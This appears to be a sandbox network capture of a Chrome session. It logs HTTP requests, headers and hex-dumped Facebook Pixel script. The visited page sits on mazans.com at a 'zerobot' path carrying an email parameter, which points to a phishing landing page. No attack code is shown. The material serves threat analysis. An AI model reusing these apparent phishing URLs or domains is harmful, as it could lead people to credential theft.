                                                                                                                                                                                                                                                                                                                                                                          report-to: {"max_age":2592000,"endpoints":[{"url":"https:\/\/www.facebook.com\/browser_reporting\/coop\/?minimize=0"}],"group":"coop_report","include_subdomains":true}, {"max_age":86400,"endpoints":[{"url":"https:\/\/www.facebook.com\/browser_reporting\/coep\/?minimize=0"}],"group":"coep_report"}, {"max_age":21600,"endpoints":[{"url":"https:\/\/www.facebook.com\/ajax\/browser_error_reports\/"}],"group":"permissions_policy"}
                                                                                                                                                                                                                                                                                                                                                                          content-security-policy: default-src 'self' data: blob: *;script-src 'nonce-ZanSqnK6' *.facebook.com *.fbcdn.net *.facebook.net 127.0.0.1:* blob: data: 'self' https://*.google-analytics.com *.google.com;style-src data: blob: 'unsafe-inline' *;connect-src *.facebook.com facebook.com *.fbcdn.net *.facebook.net wss://*.facebook.com:* wss://*.whatsapp.com:* wss://*.fbcdn.net attachment.fbsbx.com ws://localhost:* blob: *.cdninstagram.com 'self' https://*.google-analytics.com;img-src 'self' data: blob: * https://*.google-analytics.com;block-all-mixed-content;upgrade-insecure-requests;require-trusted-types-for 'script';
                                                                                                                                                                                                                                                                                                                                                                          document-policy: force-load-at-top
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:18 UTC1695INData Raw: 70 65 72 6d 69 73 73 69 6f 6e 73 2d 70 6f 6c 69 63 79 3a 20 61 63 63 65 6c 65 72 6f 6d 65 74 65 72 3d 28 29 2c 20 61 74 74 72 69 62 75 74 69 6f 6e 2d 72 65 70 6f 72 74 69 6e 67 3d 28 29 2c 20 61 75 74 6f 70 6c 61 79 3d 28 29 2c 20 62 6c 75 65 74 6f 6f 74 68 3d 28 29 2c 20 63 61 6d 65 72 61 3d 28 29 2c 20 63 68 2d 64 65 76 69 63 65 2d 6d 65 6d 6f 72 79 3d 28 29 2c 20 63 68 2d 64 6f 77 6e 6c 69 6e 6b 3d 28 29 2c 20 63 68 2d 64 70 72 3d 28 29 2c 20 63 68 2d 65 63 74 3d 28 29 2c 20 63 68 2d 72 74 74 3d 28 29 2c 20 63 68 2d 73 61 76 65 2d 64 61 74 61 3d 28 29 2c 20 63 68 2d 75 61 2d 61 72 63 68 3d 28 29 2c 20 63 68 2d 75 61 2d 62 69 74 6e 65 73 73 3d 28 29 2c 20 63 68 2d 76 69 65 77 70 6f 72 74 2d 68 65 69 67 68 74 3d 28 29 2c 20 63 68 2d 76 69 65 77 70 6f 72
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: permissions-policy: accelerometer=(), attribution-reporting=(), autoplay=(), bluetooth=(), camera=(), ch-device-memory=(), ch-downlink=(), ch-dpr=(), ch-ect=(), ch-rtt=(), ch-save-data=(), ch-ua-arch=(), ch-ua-bitness=(), ch-viewport-height=(), ch-viewpor
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:18 UTC16384INData Raw: 2f 2a 2a 0a 2a 20 43 6f 70 79 72 69 67 68 74 20 28 63 29 20 32 30 31 37 2d 70 72 65 73 65 6e 74 2c 20 46 61 63 65 62 6f 6f 6b 2c 20 49 6e 63 2e 20 41 6c 6c 20 72 69 67 68 74 73 20 72 65 73 65 72 76 65 64 2e 0a 2a 0a 2a 20 59 6f 75 20 61 72 65 20 68 65 72 65 62 79 20 67 72 61 6e 74 65 64 20 61 20 6e 6f 6e 2d 65 78 63 6c 75 73 69 76 65 2c 20 77 6f 72 6c 64 77 69 64 65 2c 20 72 6f 79 61 6c 74 79 2d 66 72 65 65 20 6c 69 63 65 6e 73 65 20 74 6f 20 75 73 65 2c 0a 2a 20 63 6f 70 79 2c 20 6d 6f 64 69 66 79 2c 20 61 6e 64 20 64 69 73 74 72 69 62 75 74 65 20 74 68 69 73 20 73 6f 66 74 77 61 72 65 20 69 6e 20 73 6f 75 72 63 65 20 63 6f 64 65 20 6f 72 20 62 69 6e 61 72 79 20 66 6f 72 6d 20 66 6f 72 20 75 73 65 0a 2a 20 69 6e 20 63 6f 6e 6e 65 63 74 69 6f 6e 20 77 69
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: /*** Copyright (c) 2017-present, Facebook, Inc. All rights reserved.** You are hereby granted a non-exclusive, worldwide, royalty-free license to use,* copy, modify, and distribute this software in source code or binary form for use* in connection wi
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:18 UTC1500INData Raw: 69 6f 6e 20 67 28 61 2c 62 29 7b 69 66 28 21 28 61 20 69 6e 73 74 61 6e 63 65 6f 66 20 62 29 29 74 68 72 6f 77 20 6e 65 77 20 54 79 70 65 45 72 72 6f 72 28 22 43 61 6e 6e 6f 74 20 63 61 6c 6c 20 61 20 63 6c 61 73 73 20 61 73 20 61 20 66 75 6e 63 74 69 6f 6e 22 29 7d 66 75 6e 63 74 69 6f 6e 20 68 28 61 2c 62 29 7b 69 66 28 21 61 29 74 68 72 6f 77 20 6e 65 77 20 52 65 66 65 72 65 6e 63 65 45 72 72 6f 72 28 22 74 68 69 73 20 68 61 73 6e 27 74 20 62 65 65 6e 20 69 6e 69 74 69 61 6c 69 73 65 64 20 2d 20 73 75 70 65 72 28 29 20 68 61 73 6e 27 74 20 62 65 65 6e 20 63 61 6c 6c 65 64 22 29 3b 72 65 74 75 72 6e 20 62 26 26 28 74 79 70 65 6f 66 20 62 3d 3d 3d 22 6f 62 6a 65 63 74 22 7c 7c 74 79 70 65 6f 66 20 62 3d 3d 3d 22 66 75 6e 63 74 69 6f 6e 22 29 3f 62 3a 61
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: ion g(a,b){if(!(a instanceof b))throw new TypeError("Cannot call a class as a function")}function h(a,b){if(!a)throw new ReferenceError("this hasn't been initialised - super() hasn't been called");return b&&(typeof b==="object"||typeof b==="function")?b:a
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:18 UTC14884INData Raw: 41 72 72 61 79 2e 66 72 6f 6d 28 63 2e 76 61 6c 75 65 73 28 29 29 7d 66 75 6e 63 74 69 6f 6e 20 68 28 61 2c 62 29 7b 61 3d 67 28 61 2c 62 29 3b 76 61 72 20 64 3d 22 22 3b 62 3d 5b 5d 2e 63 6f 6e 63 61 74 28 6a 28 61 29 29 2e 73 6f 72 74 28 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 72 65 74 75 72 6e 20 61 2e 70 61 72 61 6d 43 6f 6e 66 69 67 2e 71 75 65 72 79 2e 6c 6f 63 61 6c 65 43 6f 6d 70 61 72 65 28 62 2e 70 61 72 61 6d 43 6f 6e 66 69 67 2e 71 75 65 72 79 29 7d 29 3b 62 2e 66 6f 72 45 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 61 29 7b 76 61 72 20 62 3d 61 2e 70 61 72 61 6d 43 6f 6e 66 69 67 2e 70 72 65 66 69 78 2c 65 3d 61 2e 70 61 72 61 6d 43 6f 6e 66 69 67 2e 65 62 70 5f 70 61 74 68 3b 61 3d 61 2e 70 61 72 61 6d 56 61 6c 75 65 21 3d 6e 75 6c 6c 3f 61 2e
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: Array.from(c.values())}function h(a,b){a=g(a,b);var d="";b=[].concat(j(a)).sort(function(a,b){return a.paramConfig.query.localeCompare(b.paramConfig.query)});b.forEach(function(a){var b=a.paramConfig.prefix,e=a.paramConfig.ebp_path;a=a.paramValue!=null?a.
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:18 UTC1500INData Raw: 6f 6e 28 61 29 7b 66 2e 5f 5f 66 62 65 76 65 6e 74 73 52 65 73 6f 6c 76 65 64 4d 6f 64 75 6c 65 73 5b 61 5d 7c 7c 28 66 2e 5f 5f 66 62 65 76 65 6e 74 73 52 65 73 6f 6c 76 65 64 4d 6f 64 75 6c 65 73 5b 61 5d 3d 66 2e 5f 5f 66 62 65 76 65 6e 74 73 4d 6f 64 75 6c 65 73 5b 61 5d 28 29 29 3b 72 65 74 75 72 6e 20 66 2e 5f 5f 66 62 65 76 65 6e 74 73 52 65 73 6f 6c 76 65 64 4d 6f 64 75 6c 65 73 5b 61 5d 7d 2c 66 2e 66 62 49 73 4d 6f 64 75 6c 65 4c 6f 61 64 65 64 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 21 21 66 2e 5f 5f 66 62 65 76 65 6e 74 73 4d 6f 64 75 6c 65 73 5b 61 5d 7d 2c 66 2e 65 6e 73 75 72 65 4d 6f 64 75 6c 65 52 65 67 69 73 74 65 72 65 64 3d 66 75 6e 63 74 69 6f 6e 28 62 2c 61 29 7b 66 2e 66 62 49 73 4d 6f 64 75 6c 65 4c 6f 61 64 65 64
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: on(a){f.__fbeventsResolvedModules[a]||(f.__fbeventsResolvedModules[a]=f.__fbeventsModules[a]());return f.__fbeventsResolvedModules[a]},f.fbIsModuleLoaded=function(a){return!!f.__fbeventsModules[a]},f.ensureModuleRegistered=function(b,a){f.fbIsModuleLoaded
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:18 UTC14884INData Raw: 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 72 65 74 75 72 6e 21 6f 28 61 2e 69 64 29 3f 7b 7d 3a 7b 69 61 62 3a 31 7d 7d 29 3b 67 2e 6c 69 73 74 65 6e 28 66 75 6e 63 74 69 6f 6e 28 62 2c 63 29 7b 69 66 28 21 6f 28 62 29 29 72 65 74 75 72 6e 3b 62 3d 61 2e 6c 6f 63 61 74 69 6f 6e 2e 6f 72 69 67 69 6e 2b 22 5f 22 2b 44 61 74 65 2e 6e 6f 77 28 29 2b 22 5f 22 2b 4d 61 74 68 2e 72 61 6e 64 6f 6d 28 29 3b 62 3d 6c 28 62 29 3b 76 61 72 20 64 3d 63 2e 67 65 74 28 22 65 69 64 22 29 3b 69 66 28 64 21 3d 6e 75 6c 6c 26 26 64 21 3d 3d 22 22 7c 7c 62 3d 3d 6e 75 6c 6c 29 72 65 74 75 72 6e 3b 63 2e 61 70 70 65 6e 64 28 22 61 70 63 6d 5f 65 69 64 22 2c 22 31 22 29 3b 64 3d 22 70 63 6d 5f 70 6c 75 67 69 6e 2d 73 65 74 5f 22 2b 62 3b 63 2e 61 70 70 65 6e 64 28 22 65 69 64
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: function(a,b){return!o(a.id)?{}:{iab:1}});g.listen(function(b,c){if(!o(b))return;b=a.location.origin+"_"+Date.now()+"_"+Math.random();b=l(b);var d=c.get("eid");if(d!=null&&d!==""||b==null)return;c.append("apcm_eid","1");d="pcm_plugin-set_"+b;c.append("eid
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:18 UTC1500INData Raw: 76 65 72 73 69 6f 6e 29 7d 63 61 74 63 68 28 61 29 7b 66 3d 21 30 2c 67 3d 61 7d 66 69 6e 61 6c 6c 79 7b 74 72 79 7b 21 65 26 26 68 5b 22 72 65 74 75 72 6e 22 5d 26 26 68 5b 22 72 65 74 75 72 6e 22 5d 28 29 7d 66 69 6e 61 6c 6c 79 7b 69 66 28 66 29 74 68 72 6f 77 20 67 7d 7d 75 2e 73 65 74 28 71 2c 53 74 72 69 6e 67 28 62 29 29 3b 78 28 64 2c 75 2c 73 29 7d 29 5b 22 63 61 74 63 68 22 5d 28 66 75 6e 63 74 69 6f 6e 28 61 29 7b 61 2e 6d 65 73 73 61 67 65 3d 22 5b 43 6c 69 65 6e 74 48 69 6e 74 20 45 72 72 6f 72 5d 22 2b 61 2e 6d 65 73 73 61 67 65 2c 6a 28 61 29 7d 29 3b 68 2e 6c 69 73 74 65 6e 28 66 75 6e 63 74 69 6f 6e 28 62 29 7b 62 3d 64 2e 67 65 74 50 69 78 65 6c 28 62 29 3b 69 66 28 62 3d 3d 6e 75 6c 6c 29 72 65 74 75 72 6e 3b 62 3d 64 2e 70 6c 75 67 69
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: version)}catch(a){f=!0,g=a}finally{try{!e&&h["return"]&&h["return"]()}finally{if(f)throw g}}u.set(q,String(b));x(d,u,s)})["catch"](function(a){a.message="[ClientHint Error]"+a.message,j(a)});h.listen(function(b){b=d.getPixel(b);if(b==null)return;b=d.plugi
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:18 UTC14884INData Raw: 6c 65 64 20 63 6f 72 72 65 63 74 6c 79 20 6f 6e 20 74 68 69 73 20 70 61 67 65 22 7d 2c 22 2a 22 29 3b 22 65 72 72 6f 72 22 69 6e 20 63 6f 6e 73 6f 6c 65 26 26 63 6f 6e 73 6f 6c 65 2e 65 72 72 6f 72 28 22 46 61 63 65 62 6f 6f 6b 20 50 69 78 65 6c 20 45 72 72 6f 72 3a 20 50 69 78 65 6c 20 63 6f 64 65 20 69 73 20 6e 6f 74 20 69 6e 73 74 61 6c 6c 65 64 20 63 6f 72 72 65 63 74 6c 79 20 6f 6e 20 74 68 69 73 20 70 61 67 65 22 29 3b 72 65 74 75 72 6e 21 31 7d 72 65 74 75 72 6e 21 30 7d 28 29 29 72 65 74 75 72 6e 3b 66 2e 5f 5f 66 62 65 76 65 6e 74 73 4d 6f 64 75 6c 65 73 7c 7c 28 66 2e 5f 5f 66 62 65 76 65 6e 74 73 4d 6f 64 75 6c 65 73 3d 7b 7d 2c 66 2e 5f 5f 66 62 65 76 65 6e 74 73 52 65 73 6f 6c 76 65 64 4d 6f 64 75 6c 65 73 3d 7b 7d 2c 66 2e 67 65 74 46 62 65
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: led correctly on this page"},"*");"error"in console&&console.error("Facebook Pixel Error: Pixel code is not installed correctly on this page");return!1}return!0}())return;f.__fbeventsModules||(f.__fbeventsModules={},f.__fbeventsResolvedModules={},f.getFbe
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:18 UTC1500INData Raw: 28 22 66 62 65 76 65 6e 74 73 2e 70 6c 75 67 69 6e 73 2e 67 61 74 69 6e 67 22 2c 65 2e 65 78 70 6f 72 74 73 29 3b 0a 66 2e 65 6e 73 75 72 65 4d 6f 64 75 6c 65 52 65 67 69 73 74 65 72 65 64 28 22 66 62 65 76 65 6e 74 73 2e 70 6c 75 67 69 6e 73 2e 67 61 74 69 6e 67 22 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 0a 72 65 74 75 72 6e 20 65 2e 65 78 70 6f 72 74 73 7d 29 7d 29 28 29 7d 29 28 77 69 6e 64 6f 77 2c 64 6f 63 75 6d 65 6e 74 2c 6c 6f 63 61 74 69 6f 6e 2c 68 69 73 74 6f 72 79 29 3b 0a 66 62 71 2e 72 65 67 69 73 74 65 72 50 6c 75 67 69 6e 28 22 37 33 31 39 35 30 39 36 33 36 30 36 36 33 37 22 2c 20 7b 5f 5f 66 62 45 76 65 6e 74 73 50 6c 75 67 69 6e 3a 20 31 2c 20 70 6c 75 67 69 6e 3a 20 66 75 6e 63 74 69 6f 6e 28 66 62 71 2c 20 69 6e 73 74 61 6e 63 65 2c 20 63
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: ("fbevents.plugins.gating",e.exports);f.ensureModuleRegistered("fbevents.plugins.gating",function(){return e.exports})})()})(window,document,location,history);fbq.registerPlugin("731950963606637", {__fbEventsPlugin: 1, plugin: function(fbq, instance, c
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:18 UTC2992INData Raw: 2e 73 65 74 28 22 37 33 31 39 35 30 39 36 33 36 30 36 36 33 37 22 2c 20 22 70 72 6f 68 69 62 69 74 65 64 53 6f 75 72 63 65 73 22 2c 20 7b 22 70 72 6f 68 69 62 69 74 65 64 53 6f 75 72 63 65 73 22 3a 5b 7b 22 64 6f 6d 61 69 6e 22 3a 22 30 30 61 39 65 30 62 35 61 35 65 63 61 33 61 34 63 35 66 33 30 38 62 31 61 64 62 32 61 35 36 65 38 33 39 39 33 62 61 34 63 37 64 31 31 63 61 66 30 38 33 36 35 31 32 34 33 66 31 61 37 30 33 64 22 7d 5d 7d 29 3b 0a 66 62 71 2e 6c 6f 61 64 50 6c 75 67 69 6e 28 22 70 72 6f 68 69 62 69 74 65 64 73 6f 75 72 63 65 73 22 29 3b 0a 69 6e 73 74 61 6e 63 65 2e 6f 70 74 49 6e 28 22 37 33 31 39 35 30 39 36 33 36 30 36 36 33 37 22 2c 20 22 50 72 6f 68 69 62 69 74 65 64 53 6f 75 72 63 65 73 22 2c 20 74 72 75 65 29 3b 0a 63 6f 6e 66 69 67 2e
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: .set("731950963606637", "prohibitedSources", {"prohibitedSources":[{"domain":"00a9e0b5a5eca3a4c5f308b1adb2a56e83993ba4c7d11caf083651243f1a703d"}]});fbq.loadPlugin("prohibitedsources");instance.optIn("731950963606637", "ProhibitedSources", true);config.


                                                                                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                          96192.168.2.1749925151.101.65.1404436552C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:18 UTC340OUTPOST /reports HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                          Host: w3-reporting-nel.reddit.com
                                                                                                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                          Content-Length: 693
                                                                                                                                                                                                                                                                                                                                                                          Content-Type: application/reports+json
                                                                                                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:18 UTC693OUTData Raw: 5b 7b 22 61 67 65 22 3a 30 2c 22 62 6f 64 79 22 3a 7b 22 65 6c 61 70 73 65 64 5f 74 69 6d 65 22 3a 31 31 38 31 2c 22 6d 65 74 68 6f 64 22 3a 22 47 45 54 22 2c 22 70 68 61 73 65 22 3a 22 61 70 70 6c 69 63 61 74 69 6f 6e 22 2c 22 70 72 6f 74 6f 63 6f 6c 22 3a 22 68 74 74 70 2f 31 2e 31 22 2c 22 72 65 66 65 72 72 65 72 22 3a 22 22 2c 22 73 61 6d 70 6c 69 6e 67 5f 66 72 61 63 74 69 6f 6e 22 3a 30 2e 33 2c 22 73 65 72 76 65 72 5f 69 70 22 3a 22 31 35 31 2e 31 30 31 2e 36 35 2e 31 34 30 22 2c 22 73 74 61 74 75 73 5f 63 6f 64 65 22 3a 32 30 30 2c 22 74 79 70 65 22 3a 22 6f 6b 22 7d 2c 22 74 79 70 65 22 3a 22 6e 65 74 77 6f 72 6b 2d 65 72 72 6f 72 22 2c 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 2f 2f 61 6c 62 2e 72 65 64 64 69 74 2e 63 6f 6d 2f 72 70 2e 67 69 66 3f
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: [{"age":0,"body":{"elapsed_time":1181,"method":"GET","phase":"application","protocol":"http/1.1","referrer":"","sampling_fraction":0.3,"server_ip":"151.101.65.140","status_code":200,"type":"ok"},"type":"network-error","url":"https://alb.reddit.com/rp.gif?
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:18 UTC681INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                                                                                                          Content-Length: 0
                                                                                                                                                                                                                                                                                                                                                                          content-type: text/plain; charset=utf-8
                                                                                                                                                                                                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                          Date: Wed, 13 Nov 2024 16:29:18 GMT
                                                                                                                                                                                                                                                                                                                                                                          Via: 1.1 varnish
                                                                                                                                                                                                                                                                                                                                                                          Strict-Transport-Security: max-age=31536000; includeSubdomains
                                                                                                                                                                                                                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                                                          X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                                                                                                                          X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                                                                                          server: snooserv
                                                                                                                                                                                                                                                                                                                                                                          Access-Control-Allow-Origin: https://www.reddit.com
                                                                                                                                                                                                                                                                                                                                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                                                                                                                                                                                                          Access-Control-Allow-Methods: POST, OPTIONS
                                                                                                                                                                                                                                                                                                                                                                          Access-Control-Allow-Headers: Content-Type,Origin,X-origination-host,X-origination-path
                                                                                                                                                                                                                                                                                                                                                                          Access-Control-Expose-Headers: *
                                                                                                                                                                                                                                                                                                                                                                          Access-Control-Max-Age: 86400
                                                                                                                                                                                                                                                                                                                                                                          Vary: Origin


                                                                                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                          97192.168.2.1749922157.240.253.354436552C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:18 UTC907OUTGET /tr/?id=731950963606637&ev=PageView&dl=https%3A%2F%2Fmazans.com%2FWEB-ID-6672849687924%2Fzerobot%2F%3Femail%3DEMAIL_REDACTED&rl=https%3A%2F%2Fsepedatua.com%2F&if=false&ts=1731515356384&sw=1280&sh=1024&v=2.9.176&r=stable&ec=0&o=4126&fbp=fb.1.1731515356382.644741780521606255&ler=other&cdl=API_unavailable&it=1731515354065&coo=false&rqm=GET HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                          Host: www.facebook.com
                                                                                                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                                                                                                                          Referer: https://mazans.com/
                                                                                                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:18 UTC465INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                          Content-Type: text/plain
                                                                                                                                                                                                                                                                                                                                                                          Access-Control-Allow-Origin:
                                                                                                                                                                                                                                                                                                                                                                          Access-Control-Allow-Credentials: true
                                                                                                                                                                                                                                                                                                                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                                                                                                                                                                                                                                                                                                                                          cross-origin-resource-policy: cross-origin
                                                                                                                                                                                                                                                                                                                                                                          Server: proxygen-bolt
                                                                                                                                                                                                                                                                                                                                                                          X-FB-Connection-Quality: GOOD; q=0.7, rtt=119, rtx=0, c=10, mss=1380, tbw=3403, tp=-1, tpl=-1, uplat=0, ullat=0
                                                                                                                                                                                                                                                                                                                                                                          Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                                                                                                          Date: Wed, 13 Nov 2024 16:29:18 GMT
                                                                                                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                                                                                                          Content-Length: 0


                                                                                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                          98192.168.2.1749920157.240.0.64436552C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:18 UTC1558OUTGET /signals/config/1040773425961662?v=2.9.176&r=stable&domain=mazans.com&hme=872f04a0547459b3285cb03b0d7a47bfde40628f4b386809918a621e2688602f&ex_m=70%2C121%2C107%2C111%2C61%2C4%2C100%2C69%2C16%2C97%2C89%2C51%2C54%2C172%2C175%2C187%2C183%2C184%2C186%2C29%2C101%2C53%2C77%2C185%2C167%2C170%2C180%2C181%2C188%2C131%2C41%2C189%2C190%2C34%2C143%2C15%2C50%2C195%2C194%2C133%2C18%2C40%2C1%2C43%2C65%2C66%2C67%2C71%2C93%2C17%2C14%2C96%2C92%2C91%2C108%2C52%2C110%2C39%2C109%2C30%2C94%2C26%2C168%2C171%2C140%2C86%2C56%2C84%2C33%2C73%2C0%2C95%2C32%2C28%2C82%2C83%2C88%2C47%2C46%2C87%2C37%2C11%2C12%2C13%2C6%2C7%2C25%2C22%2C23%2C57%2C62%2C64%2C75%2C102%2C27%2C76%2C9%2C8%2C80%2C48%2C21%2C104%2C103%2C105%2C98%2C10%2C20%2C3%2C38%2C74%2C19%2C5%2C90%2C81%2C44%2C35%2C85%2C2%2C36%2C63%2C42%2C106%2C45%2C79%2C68%2C112%2C60%2C59%2C31%2C99%2C58%2C55%2C49%2C78%2C72%2C24%2C113%2C201%2C200%2C202%2C207%2C208%2C209%2C205%2C197%2C132%2C163%2C196%2C198%2C122%2C157%2C145%2C151%2C129%2C233%2C116%2C127%2C234%2C165%2C119%2C236%2C166%2C136%2C123%2C15 [TRUNCATED]
                                                                                                                                                                                                                                                                                                                                                                          Host: connect.facebook.net
                                                                                                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                                                                                                                                          Referer: https://mazans.com/
                                                                                                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:18 UTC1452INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                                          Content-Type: application/x-javascript; charset=utf-8
                                                                                                                                                                                                                                                                                                                                                                          timing-allow-origin: *
                                                                                                                                                                                                                                                                                                                                                                          reporting-endpoints: coop_report="https://www.facebook.com/browser_reporting/coop/?minimize=0", coep_report="https://www.facebook.com/browser_reporting/coep/?minimize=0", permissions_policy="https://www.facebook.com/ajax/browser_error_reports/"
                                                                                                                                                                                                                                                                                                                                                                          report-to: {"max_age":2592000,"endpoints":[{"url":"https:\/\/www.facebook.com\/browser_reporting\/coop\/?minimize=0"}],"group":"coop_report","include_subdomains":true}, {"max_age":86400,"endpoints":[{"url":"https:\/\/www.facebook.com\/browser_reporting\/coep\/?minimize=0"}],"group":"coep_report"}, {"max_age":21600,"endpoints":[{"url":"https:\/\/www.facebook.com\/ajax\/browser_error_reports\/"}],"group":"permissions_policy"}
                                                                                                                                                                                                                                                                                                                                                                          content-security-policy: default-src 'self' data: blob: *;script-src 'nonce-NOKQBivR' *.facebook.com *.fbcdn.net *.facebook.net 127.0.0.1:* blob: data: 'self' https://*.google-analytics.com *.google.com;style-src data: blob: 'unsafe-inline' *;connect-src *.facebook.com facebook.com *.fbcdn.net *.facebook.net wss://*.facebook.com:* wss://*.whatsapp.com:* wss://*.fbcdn.net attachment.fbsbx.com ws://localhost:* blob: *.cdninstagram.com 'self' https://*.google-analytics.com;img-src 'self' data: blob: * https://*.google-analytics.com;block-all-mixed-content;upgrade-insecure-requests;require-trusted-types-for 'script';
                                                                                                                                                                                                                                                                                                                                                                          document-policy: force-load-at-top
